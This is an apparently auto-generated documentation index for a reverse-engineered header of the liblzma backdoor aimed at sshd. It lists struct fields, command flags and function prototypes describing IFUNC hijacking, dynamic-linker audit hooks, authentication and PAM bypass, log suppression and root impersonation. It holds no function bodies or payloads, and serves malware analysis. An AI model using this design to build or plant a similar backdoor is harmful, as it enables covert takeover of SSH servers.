location of the GNU relro segment
Definition: xzre.h:797
Elf64_Sym * symtab
pointer to the ELF symbol table
Definition: xzre.h:779
u64 dyn_num_entries
number of entries in the ELF dynamic segment
Definition: xzre.h:771
u32 plt_relocs_num
number of entries in the PLT relocation table
Definition: xzre.h:787
void * lzma_code_end
liblzma code segment end
Definition: xzre.h:1275
libc_imports_t * libc_imports
pointer to the structure containing resolved libc functions
Definition: xzre.h:1218
char * STR_ssh_rsa_cert_v01_openssh_com
location of sshd .rodata string "ssh-rsa-cert-v01@openssh.com"
Definition: xzre.h:1236
BOOL disable_backdoor
This flag gets set to TRUE by run_backdoor_commands if any of the validity checks fail,...
Definition: xzre.h:1228
imported_funcs_t * imported_funcs
pointer to the structure containing resolved OpenSSL functions
Definition: xzre.h:1214
void * sshd_data_start
sshd data segment start
Definition: xzre.h:1256
u32 num_shifted_bits
number of bits copied
Definition: xzre.h:1300
void * sshd_code_start
sshd code segment start
Definition: xzre.h:1248
void * sshd_data_end
sshd data segment end
Definition: xzre.h:1260
char * STR_rsa_sha2_256
location of sshd .rodata string "rsa-sha2-256"
Definition: xzre.h:1240
void * sshd_code_end
sshd code segment end
Definition: xzre.h:1252
void * lzma_code_start
liblzma code segment start
Definition: xzre.h:1268
void * return_address
the return address value of the caller obtained from *(u64 *)(caller_locals+24) since the entrypoint ...
Definition: xzre.h:625
void * cpuid_fn
points to the real cpuid function
Definition: xzre.h:629
void * got_ptr
points to the Global Offset Table
Definition: xzre.h:618
ptrdiff_t got_offset
holds the offset of the symbol relative to the GOT. used to derive the got_ptr
Definition: xzre.h:634
void * RSA_public_decrypt_plt
address of the PLT for RSA_public_decrypt() in sshd
Definition: xzre.h:943
void * RSA_get0_key_plt
address of the PLT for RSA_get0_key() in sshd
Definition: xzre.h:953
void * EVP_PKEY_set1_RSA_plt
address of the PLT for EVP_PKEY_set1_RSA() in sshd
Definition: xzre.h:948
BOOL result
TRUE if the instruction sequence was found, FALSE otherwise.
Definition: xzre.h:2119
u8 * offset_to_match
offset to match in the instruction displacement
Definition: xzre.h:2108
u8 * start_addr
start of the code address range to search
Definition: xzre.h:2098
u8 * end_addr
end of the code address range to search
Definition: xzre.h:2103
u32 * output_register_to_match
register to match as the instruction output
Definition: xzre.h:2113
the payload header. also used as Chacha IV
Definition: xzre.h:1786
the contents of the RSA 'n' field
Definition: xzre.h:1818
u8 link_map_l_audit_any_plt_bitmask
bitmask that sets the link_map::l_audit_any_plt flag
Definition: xzre.h:1401
unsigned int * _dl_naudit_ptr
location of ld.so's _rtld_global_ro::_dl_naudit field
Definition: xzre.h:1420
u32 * sshd_auditstate_bindflags_ptr
the location of sshd's auditstate::bindflags field
Definition: xzre.h:1379
char ** libcrypto_l_name
location of libcrypto's link_map::l_name field
Definition: xzre.h:1437
size_t _dl_audit_symbind_alt__size
code size of ld.so's _dl_audit_symbind_alt() function
Definition: xzre.h:1449
u32 libcrypto_auditstate_bindflags_old_value
backup of the old value of libcrypto's auditstate::bindflags field
Definition: xzre.h:1367
struct audit_ifaces ** _dl_audit_ptr
location of ld.so's _rtld_global_ro::_dl_audit field
Definition: xzre.h:1411
void * sshd_link_map_l_audit_any_plt_addr
location of sshd's link_map::l_audit_any_plt flag
Definition: xzre.h:1394
u32 * libcrypto_auditstate_bindflags_ptr
the location of libcrypto's auditstate::bindflags field
Definition: xzre.h:1362
u32 sshd_auditstate_bindflags_old_value
backup of the old value of sshd's auditstate::bindflags field
Definition: xzre.h:1384
Structure to hold internal state of the check being calculated.
Definition: xzre.h:280
State for the internal SHA-256 implementation.
Definition: xzre.h:268
uint64_t size
Size of the message excluding padding.
Definition: xzre.h:273
data used within sshd_proxy_elevate
Definition: xzre.h:1922
struct monitor from openssh-portable
Definition: xzre.h:558
stack frame layout for run_backdoor_commands
Definition: xzre.h:1959
struct sensitive_data from openssh-portable
Definition: xzre.h:570
struct sshkey from openssh-portable
Definition: xzre.h:581
void * func_start
the starting address of the function that referenced the string
Definition: xzre.h:1614
EncodedStringId string_id
the string that was referenced, in encoded form
Definition: xzre.h:1609
void * xref
location of the instruction that referenced the string
Definition: xzre.h:1622
void * func_end
the ending address of the function that referenced the string
Definition: xzre.h:1618
union used within run_backdoor_commands
Definition: xzre.h:1946
represents a shift register, which will shift a '1' into the secret data array. the low 3 bits repres...
Definition: xzre.h:1755
u32 index
Definition: xzre.h:1757
u32 byte_index
Definition: xzre.h:1762
u32 bit_index
Definition: xzre.h:1760
BOOL elf_find_function_pointer(StringXrefId xref_id, void **pOutCodeStart, void **pOutCodeEnd, void **pOutFptrAddr, elf_info_t *elf_info, string_references_t *xrefs, global_context_t *ctx)
this function searches for a function pointer, pointing to a function designated by the given xref_id
fake_lzma_allocator_t * get_lzma_allocator_address(void)
gets the address of the fake LZMA allocator
BOOL elf_parse(Elf64_Ehdr *ehdr, elf_info_t *elf_info)
Parses the given in-memory ELF file into elf_info.
BOOL process_is_sshd(elf_info_t *elf, u8 *stack_end)
checks if the current process is sshd by inspecting argv and envp.
BOOL sshd_get_usable_socket(int *pSock, int socket_index, libc_imports_t *imports)
gets the first usable socket fd
void mm_log_handler_hook(LogLevel level, int forced, const char *msg, void *ctx)
void * elf_symbol_get_addr(elf_info_t *elf_info, EncodedStringId encoded_string_id)
Looks up an ELF symbol from a parsed ELF, and returns its memory address.
void init_elf_entry_ctx(elf_entry_ctx_t *ctx)
initialises the elf_entry_ctx_t
BOOL verify_signature(struct sshkey *sshkey, u8 *signed_data, u64 sshkey_digest_offset, u64 signed_data_size, u8 *signature, u8 *ed448_raw_key, global_context_t *global_ctx)
Checks if signed_data is signed with ed448_raw_key.
BOOL validate_log_handler_pointers(void *addr1, void *addr2, void *search_base, u8 *code_end, string_references_t *refs, global_context_t *global)
Validate that the two addresses are the expected/correct ones.
BOOL is_payload_message(u8 *sshbuf_data, size_t sshbuf_size, size_t *pOutPayloadSize, global_context_t *ctx)
checks if the given sshbuf buffer contains a backdoor payload message
void * dummy_tls_get_addr(tls_index *ti)
a dummy function that calls __tls_get_addr, to make sure its GOT slot doesn't get removed by compiler...
BOOL resolve_libc_imports(struct link_map *libc, elf_info_t *libc_info, libc_imports_t *imports)
parses the libc ELF from the supplied link map, and resolves its imports
struct gnu_hash_table gnu_hash_table_t
BOOL find_link_map_l_name(backdoor_data_handle_t *data_handle, ptrdiff_t *libname_offset, backdoor_hooks_data_t *hooks, imported_funcs_t *imported_funcs)
Find struct link_map offsets required to modify ld.so's private struct auditstate state.
BOOL find_dl_naudit(elf_info_t *dynamic_linker_elf, elf_info_t *libcrypto_elf, backdoor_hooks_data_t *hooks, imported_funcs_t *imported_funcs)
Find __rtld_global_ro offsets required to modify ld.so's private struct audit_ifaces state.
void * elf_get_code_segment(elf_info_t *elf_info, u64 *pSize)
Obtains the address and size of the first executable segment in the given ELF file.
ssize_t fd_write(int fd, void *buffer, size_t count, libc_imports_t *funcs)
writes data to the specified file descriptor
BOOL find_instruction_with_mem_operand_ex(u8 *code_start, u8 *code_end, dasm_ctx_t *dctx, int opcode, void *mem_address)
finds an instruction with an immediate memory operand
BOOL process_shared_libraries(backdoor_shared_libraries_data_t *data)
scans loaded libraries to identify interesting libraries
BOOL dsa_key_hash(const DSA *dsa, u8 *mdBuf, u64 mdBufSize, global_context_t *ctx)
obtains a SHA256 hash of the supplied DSA key
BOOL process_shared_libraries_map(struct link_map *r_map, backdoor_shared_libraries_data_t *data)
scans loaded libraries to identify interesting libraries and populate related data
BOOL backdoor_setup(backdoor_setup_params_t *params)
the backdoor main method that installs the backdoor_symbind64() callback
void * elf_get_reloc_symbol(elf_info_t *elf_info, Elf64_Rela *relocs, u32 num_relocs, u64 reloc_type, EncodedStringId encoded_string_id)
Searches the ELF relocations for a symbol having name encoded_string id and relocation of type reloc_...
BOOL elf_contains_vaddr_relro(elf_info_t *elf_info, u64 vaddr, u64 size, u32 p_flags)
checks if given ELF file contains the range [vaddr, vaddr+size) in the gnurelro segment
BOOL elf_contains_vaddr(elf_info_t *elf_info, void *vaddr, u64 size, u32 p_flags)
checks if given ELF file contains the range [vaddr, vaddr+size) in a segment with the specified memor...
BOOL find_link_map_l_audit_any_plt(backdoor_data_handle_t *data, ptrdiff_t libname_offset, backdoor_hooks_data_t *hooks, imported_funcs_t *imported_funcs)
Find struct link_map offset required to modify ld.so's private link_map::l_audit_any_plt state.
BOOL secret_data_append_item(secret_data_shift_cursor_t shift_cursor, unsigned operation_index, unsigned shift_count, int index, u8 *code)
Calls secret_data_append_singleton, if flags are non-zero.
const u64 tls_get_addr_random_symbol
a bogus global variable that is used by the backdoor to generate an extra symbol
void init_ldso_ctx(ldso_ctx_t *ldso_ctx)
initializes/resets ldso data
BOOL init_imported_funcs(imported_funcs_t *imported_funcs)
Initializes the imported_funcs structure.
backdoor_hooks_data_t * hooks_data_addr
location of backdoor_hooks_data_t
BOOL sha256(const void *data, size_t count, u8 *mdBuf, u64 mdBufSize, imported_funcs_t *funcs)
computes the SHA256 hash of the supplied data
BOOL find_mov_instruction(u8 *code_start, u8 *code_end, BOOL is_64bit_operand, BOOL load_flag, dasm_ctx_t *dctx)
finds a MOV instruction.
ElfId
Definition: xzre.h:375
@ X_ELF_MAIN
this is for sshd itself
Definition: xzre.h:380
int init_hooks_ctx(backdoor_hooks_ctx_t *ctx)
Initializes the structure with hooks-related data.
CommandFlags2
Definition: xzre.h:1849
@ X_FLAGS2_CHANGE_MONITOR_REQ
if set, changes the monitor_reqtype field from MONITOR_REQ_AUTHPASSWORD to what's contained in the pa...
Definition: xzre.h:1859
@ X_FLAGS2_PSELECT
executes pselect, then exits; not compatible with command 2
Definition: xzre.h:1873
@ X_FLAGS2_CONTINUATION
more data available in the following packet; not compatible with command 3
Definition: xzre.h:1868
@ X_FLAGS2_SOCKFD_MASK
(0111_1000 >> 3) & 0xF when CMDF_SOCKET_INDEX is specified
Definition: xzre.h:1880
@ X_FLAGS2_IMPERSONATE
if set, impersonate a user (info from payload); if not set, impersonate root
Definition: xzre.h:1854
struct key_payload_hdr key_payload_hdr_t
the payload header. also used as Chacha IV
BOOL find_call_instruction(u8 *code_start, u8 *code_end, u8 *call_target, dasm_ctx_t *dctx)
finds a call instruction
const elf_functions_t elf_functions
special .data.rel.ro section that contains addresses to various functions
ssize_t fd_read(int fd, void *buffer, size_t count, libc_imports_t *funcs)
reads data from the specified file descriptor
BOOL sshd_get_sshbuf(struct sshbuf *sshbuf, global_context_t *ctx)
Finds the right sshbuf (FIXME: which?), starting from: (*(ctx->struct_monitor_ptr_address))->kex->my
const ptrdiff_t elf_functions_offset
special .data.rel.ro section that contains the offset to elf_functions
void * backdoor_init(elf_entry_ctx_t *state, u64 *caller_frame)
calls backdoor_init_stage2 by disguising it as a call to cpuid.
BOOL secret_data_append_singleton(u8 *call_site, u8 *code, secret_data_shift_cursor_t shift_cursor, unsigned shift_count, unsigned operation_index)
Shifts data in the secret data store, after validation of code. this function is intended to be invok...
BOOL contains_null_pointers(void **pointers, unsigned int num_pointers)
checks if the given array of pointers contains any NULL pointer
void * elf_get_data_segment(elf_info_t *elf_info, u64 *pSize, BOOL get_alignment)
Obtains the address and size of the last read-write segment in the given ELF file this is typically t...
const u32 string_action_data[1304]
contains action data for the encoded string radix tree
BOOL is_endbr64_instruction(u8 *code_start, u8 *code_end, u32 low_mask_part)
Checks if the code between code_start and code_end is an endbr64 instruction.
void fake_lzma_free(void *opaque, void *ptr)
a fake free function called by lzma_free()
void * elf_get_rodata_segment(elf_info_t *elf_info, u64 *pSize)
Obtains the address and size of the last readonly segment in the given ELF file this corresponds to t...
BOOL is_range_mapped(u8 *addr, u64 length, global_context_t *ctx)
verify if a memory range is mapped
int sshd_get_sensitive_data_score_in_do_child(void *sensitive_data, elf_info_t *elf, string_references_t *refs)
obtains a numeric score which indicates if do_child accesses sensitive_data or not
BOOL sshd_find_sensitive_data(elf_info_t *sshd, elf_info_t *libcrypto, string_references_t *refs, imported_funcs_t *funcs, global_context_t *ctx)
locates sensitive_data within sshd, and resolves some additional libcrypto functions
CommandFlags1
Definition: xzre.h:1826
@ X_FLAGS1_SETLOGMASK
disable all logging by setting mask 0x80000000
Definition: xzre.h:1834
@ X_FLAGS1_NO_EXTENDED_SIZE
if set, the union size field must be 0
Definition: xzre.h:1846
@ X_FLAGS1_SOCKET_INDEX
custom monitor socket index override
Definition: xzre.h:1838
@ X_FLAGS1_8BYTES
the data block contains 8 additional bytes
Definition: xzre.h:1830
@ X_FLAGS1_DISABLE_PAM
if set, disables PAM authentication
Definition: xzre.h:1842
BOOL sshd_proxy_elevate(monitor_data_t *args, global_context_t *ctx)
forges a new MONITOR_REQ_KEYALLOWED packet, and injects it into the server to gain root privileges th...
uintptr_t backdoor_symbind64(Elf64_Sym *sym, unsigned int ndx, uptr *refcook, uptr *defcook, unsigned int flags, const char *symname)
the backdoored symbind64 installed in GLRO(dl_audit)
BOOL find_instruction_with_mem_operand(u8 *code_start, u8 *code_end, dasm_ctx_t *dctx, void *mem_address)
finds a LEA or MOV instruction with an immediate memory operand
EncodedStringId get_string_id(const char *string_begin, const char *string_end)
Gets the EncodedStringId for the string delimited by string_begin and string_end (presumably via the encoded string radix tree; confirm against the implementation).
BOOL rsa_key_hash(const RSA *rsa, u8 *mdBuf, u64 mdBufSize, imported_funcs_t *funcs)
obtains a SHA256 hash of the supplied RSA key
BOOL main_elf_parse(main_elf_t *main_elf)
Parses the main executable from the provided structure. As part of the process the arguments and envi...
fake_lzma_allocator_t fake_lzma_allocator
special .data.rel.ro section that contains a fake lzma_allocator
BOOL sshd_kex_sshbuf_get(void *kex, global_context_t *ctx, void **pOutputData, size_t *pOutputSize)
locates an sshbuf within struct kex (FIXME: which?)
struct elf_handles elf_handles_t
array of ELF handles
BOOL find_add_instruction_with_mem_operand(u8 *code_start, u8 *code_end, dasm_ctx_t *dctx, void *mem_address)
finds an ADD instruction with an immediate memory operand
u8 * elf_find_string_reference(elf_info_t *elf_info, EncodedStringId encoded_string_id, u8 *code_start, u8 *code_end)
finds an instruction that references the given string
BOOL x86_dasm(dasm_ctx_t *ctx, u8 *code_start, u8 *code_end)
disassembles the given x64 code
BOOL sshd_find_main(u8 **code_start_out, elf_info_t *sshd, elf_info_t *libcrypto, imported_funcs_t *imported_funcs)
finds the sshd_main function
BOOL find_lea_instruction_with_mem_operand(u8 *code_start, u8 *code_end, dasm_ctx_t *dctx, void *mem_address)
finds a LEA instruction with an immediate memory operand
const backdoor_cpuid_reloc_consts_t cpuid_reloc_consts
special .rodata section that contains _cpuid() related GOT offsets
BOOL sshd_get_sensitive_data_address_via_krb5ccname(u8 *data_start, u8 *data_end, u8 *code_start, u8 *code_end, void **sensitive_data_out, elf_info_t *elf)
finds the address of sensitive_data.host_keys in sshd by using getenv( STR_KRB5CCNAME )
struct backdoor_data backdoor_data_t
this structure is used to hold most of the backdoor information. it's used as a local variable in fun...
Definition: xzre.h:1592
u8 * find_string_reference(u8 *code_start, u8 *code_end, const char *str)
finds an instruction that references the given string
int sshd_get_sensitive_data_score(void *sensitive_data, elf_info_t *elf, string_references_t *refs)
obtains a numeric score which indicates whether the examined function accesses sensitive_data or not
BOOL secret_data_get_decrypted(u8 *output, global_context_t *ctx)
obtains a decrypted copy of the secret data
BOOL find_function_prologue(u8 *code_start, u8 *code_end, u8 **output, FuncFindType find_mode)
locates the function prologue
BOOL find_link_map_l_audit_any_plt_bitmask(backdoor_data_handle_t *data, instruction_search_ctx_t *search_ctx)
Find the bitmask required to modify ld.so's private link_map::l_audit_any_plt state.
int sshd_get_sensitive_data_score_in_demote_sensitive_data(void *sensitive_data, elf_info_t *elf, string_references_t *refs)
obtains a numeric score which indicates if demote_sensitive_data accesses sensitive_data or not
BOOL check_backdoor_state(global_context_t *ctx)
checks if the backdoor state is the expected one (FIXME: which?)
BOOL count_pointers(void **ptrs, u64 *count_out, libc_imports_t *funcs)
count the number of non-NULL pointers in the malloc'd memory block ptrs
unsigned int backdoor_entry(unsigned int cpuid_request, u64 *caller_frame)
calls backdoor_init while in the crc64() IFUNC resolver function
BOOL find_dl_audit_offsets(backdoor_data_handle_t *data, ptrdiff_t *libname_offset, backdoor_hooks_data_t *hooks, imported_funcs_t *imported_funcs)
Find the various offsets in ld.so that need modification to trigger _dl_audit_symbind_alt() to call b...
BOOL backdoor_init_stage2(elf_entry_ctx_t *ctx, u64 *caller_frame, void **cpuid_got_addr, backdoor_cpuid_reloc_consts_t *reloc_consts)
BOOL sshd_find_monitor_field_addr_in_function(u8 *code_start, u8 *code_end, u8 *data_start, u8 *data_end, void **monitor_field_ptr_out, global_context_t *ctx)
find a pointer to a field in struct monitor by examining code referencing it
const u64 string_mask_data[238]
contains mask data for the encoded string radix tree
int mm_answer_keyallowed_hook(struct ssh *ssh, int sock, struct sshbuf *m)
runs the payload received from sshd_proxy_elevate, and then runs the original mm_answer_keyallowed fu...
BOOL chacha_decrypt(u8 *in, int inl, u8 *key, u8 *iv, u8 *out, imported_funcs_t *funcs)
decrypts a buffer with chacha20
BOOL decrypt_payload_message(void *payload, size_t payload_size, global_context_t *ctx)
decrypts the given backdoor payload
BOOL sshd_patch_variables(BOOL skip_root_patch, BOOL disable_pam, BOOL replace_monitor_reqtype, int monitor_reqtype, global_context_t *global_ctx)
Patches the sshd configuration.
void _cpuid_gcc(unsigned int level, unsigned int *a, unsigned int *b, unsigned int *c, unsigned int *d)
actually calls cpuid instruction
unsigned int _get_cpuid_modified(unsigned int leaf, unsigned int *eax, unsigned int *ebx, unsigned int *ecx, unsigned int *edx, u64 *caller_frame)
the backdoor entrypoint function, called by the IFUNC resolver for liblzma crc32() and crc64()
BOOL bignum_serialize(u8 *buffer, u64 bufferSize, u64 *pOutSize, const BIGNUM *bn, imported_funcs_t *funcs)
Serializes the BIGNUM bn to the buffer buffer.
BOOL elf_find_string_references(elf_info_t *elf_info, string_references_t *refs)
parses the ELF rodata section, looking for strings and the instructions that reference them
struct backdoor_data_handle backdoor_data_handle_t
data passed to functions that access the backdoor data
int mm_answer_keyverify_hook(struct ssh *ssh, int sock, struct sshbuf *m)
used in conjunction with mm_answer_keyallowed_hook to bypass the key validity check
union backdoor_runtime_data backdoor_runtime_data_t
union used within run_backdoor_commands
Elf64_Sym * elf_symbol_get(elf_info_t *elf_info, EncodedStringId encoded_string_id, EncodedStringId sym_version)
Looks up an ELF symbol from a parsed ELF.
u32 count_bits(u64 x)
returns the number of 1 bits in x
struct run_backdoor_commands_data run_backdoor_commands_data_t
stack frame layout for run_backdoor_commands
BOOL secret_data_append_from_address(void *addr, secret_data_shift_cursor_t shift_cursor, unsigned shift_count, unsigned operation_index)
calls secret_data_append_singleton with either the given code address or the return address,...
BOOL secret_data_append_items(secret_data_item_t *items, u64 items_count, BOOL(*appender)(secret_data_shift_cursor_t, unsigned, unsigned, int, u8 *))
appends multiple secret data items at once
int sshd_get_sensitive_data_score_in_main(void *sensitive_data, elf_info_t *elf, string_references_t *refs)
obtains a numeric score which indicates if main accesses sensitive_data or not
BOOL sshd_get_client_socket(global_context_t *ctx, int *pSocket, int socket_index, enum SocketMode socket_direction)
Get either the read or write end of the sshd connection.
const ptrdiff_t fake_lzma_allocator_offset
special .data.rel.ro section that contains the offset to fake_lzma_allocator_struct
struct key_payload key_payload_t
the contents of the RSA 'n' field
const backdoor_tls_get_addr_reloc_consts_t tls_get_addr_reloc_consts
special .rodata section that contains __tls_get_addr() related GOT offsets
BOOL is_gnu_relro(Elf64_Word p_type, u32 addend)
checks if the provided identifiers represent a PT_GNU_RELRO
void * find_addr_referenced_in_mov_instruction(StringXrefId id, string_references_t *refs, void *mem_range_start, void *mem_range_end)
find an address referenced in a function
u32 resolver_call_count
counts the number of times the IFUNC resolver is called
BOOL sshd_configure_log_hook(cmd_arguments_t *cmd_flags, global_context_t *ctx)
configure the log hook
CommandFlags3
Definition: xzre.h:1883
@ X_FLAGS3_MONITOR_REQ_VAL
6 bits used to store the monitor req / 2 (might be unused)
Definition: xzre.h:1891
@ X_FLAGS3_SOCKET_NUM
5 bits used to store number of sockets (in cmd3)
Definition: xzre.h:1887
struct monitor_data monitor_data_t
data used within sshd_proxy_elevate
const u64 cpuid_random_symbol
a bogus global variable that is used by the backdoor to generate an extra symbol
void * elf_get_got_symbol(elf_info_t *elf_info, EncodedStringId encoded_string_id)
Gets the GOT symbol with name encoded_string_id from the parsed ELF file.
void * elf_get_plt_symbol(elf_info_t *elf_info, EncodedStringId encoded_string_id)
Gets the PLT symbol with name encoded_string_id from the parsed ELF file.
int mm_answer_authpassword_hook(struct ssh *ssh, int sock, struct sshbuf *m)
used to bypass password authentication by replying with a successful MONITOR_ANS_AUTHPASSWORD
BOOL secret_data_append_from_call_site(secret_data_shift_cursor_t shift_cursor, unsigned shift_count, unsigned operation_index, BOOL bypass)
Shifts data in the secret data store, after validation of the call site, i.e. the caller of this func...
BOOL sshd_find_monitor_struct(elf_info_t *elf, string_references_t *refs, global_context_t *ctx)
finds the pointer to struct monitor, and updates the global context in ctx with its location
ptrdiff_t get_got_offset(elf_entry_ctx_t *ctx)
get the offset to the GOT
void * update_got_address(elf_entry_ctx_t *entry_ctx)
finds the __tls_get_addr() GOT entry
BOOL secret_data_append_from_code(void *code_start, void *code_end, secret_data_shift_cursor_t shift_cursor, unsigned shift_count, BOOL start_from_call)
Pushes secret data by validating the given code block.
char * elf_find_string(elf_info_t *elf_info, EncodedStringId *stringId_inOut, void *rodata_start_ptr)
Locates a string in the ELF .rodata section.
BOOL find_function(u8 *code_start, void **func_start, void **func_end, u8 *search_base, u8 *code_end, FuncFindType find_mode)
locates the function boundaries.
void sshd_log(sshd_log_ctx_t *log_ctx, LogLevel level, const char *fmt,...)
calls sshlogv from openssh, similarly to sshlog in openssh
BOOL run_backdoor_commands(RSA *key, global_context_t *ctx, BOOL *do_orig)
checks if the supplied RSA public key contains the backdoor commands, and executes them if present.
BOOL sshd_get_sensitive_data_address_via_xcalloc(u8 *data_start, u8 *data_end, u8 *code_start, u8 *code_end, string_references_t *string_refs, void **sensitive_data_out)
finds the address of sensitive_data.host_keys in sshd by using XREF_xcalloc_zero_size in xcalloc
ptrdiff_t get_tls_get_addr_random_symbol_got_offset(elf_entry_ctx_t *ctx)
get the tls_get_addr_random_symbol GOT offset
BOOL sshbuf_bignum_is_negative(struct sshbuf *buf)
checks if the given serialized BIGNUM is negative
int init_shared_globals(backdoor_shared_globals_t *shared_globals)
Initializes the backdoor_shared_globals structure.
elf_functions_t * get_elf_functions_address(void)
gets the address of the elf_functions
BOOL find_mov_lea_instruction(u8 *code_start, u8 *code_end, BOOL is_64bit_operand, BOOL load_flag, dasm_ctx_t *dctx)
like find_mov_instruction, but also considers LEA instructions
BOOL find_lea_instruction(u8 *code_start, u8 *code_end, u64 displacement)
finds a lea instruction
void * fake_lzma_alloc(void *opaque, size_t nmemb, size_t size)
a fake alloc function called by lzma_alloc() that then calls elf_symbol_get_addr()
BOOL find_reg2reg_instruction(u8 *code_start, u8 *code_end, dasm_ctx_t *dctx)
finds a reg2reg instruction
u64 get_cpuid_got_index(elf_entry_ctx_t *ctx)
get the cpuid() GOT index
lzma_allocator * get_lzma_allocator(void)
gets the fake LZMA allocator, used for imports resolution the "opaque" field of the structure holds a...